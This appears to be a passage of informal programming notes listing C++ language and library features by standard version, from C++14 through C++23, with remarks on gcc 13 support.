Notable mentions from C++17 are structured bindings and execution policy.
See the presentation by Marc Gregoire (CppCon 2022).
- data[x, y, z] and std::mdspan
- consteval – immediate functions: only execute at compile time
- uz literals
- <generator>
- .contains for strings and containers
- <stack_trace>
- std::expected
- std::byteswap
- constexpr for std::optional and std::variant
- std::ranges::fold_left (gcc 13.1)
- std::views::slide
- std::views::enumerate (gcc 13.2) – easily enumerate your range-based for loops, you get a pair of the index and the element
- [[assume(true)]] – help introduce UB into your code with assumptions

Not supported in gcc 13.2:

- std::print
- std::flat_map and std::flat_set (contiguous binary search trees)
- import <iostream>; – modules
- ranges_to<> – convert a range to a vector (for instance)
- join/join_with – I’ve had no luck with these outside of a trivial example

A lot of effort has gone into ranges and views in C++23.
- starts_with
- shift_left
- ranges::to – not supported in gcc 13.2
- find_if
- contains
- contains_subrange
- zip
- adjacent
- pairwise
- chunk
- slide
- chunk_by
- stride – take every nth element
- repeat
- iota – infinite views may be more performant as no boundary check

- .contains for maps
- .starts_with for strings
- std::jthread – a thread you don’t have to explicitly join (it’s the same as std::thread but joins in the destructor), also has a built-in stop token
- std::barrier for thread synchronisation (like std::latch but reusable)
- std::filesystem – from Boost
- std::string_view
- std::clamp
- [[maybe_unused]]
- <string_view>
- std::byte
Also see cppreference.
C++14 is an extension and improvement of C++11.
- 0b1111000 – binary literals
- auto return type
- auto in lambda parameters
- template <class T> constexpr T bins = T{24'576}; – variable templates
- decltype(auto)
- constexpr
Less common but another set of principles to consider.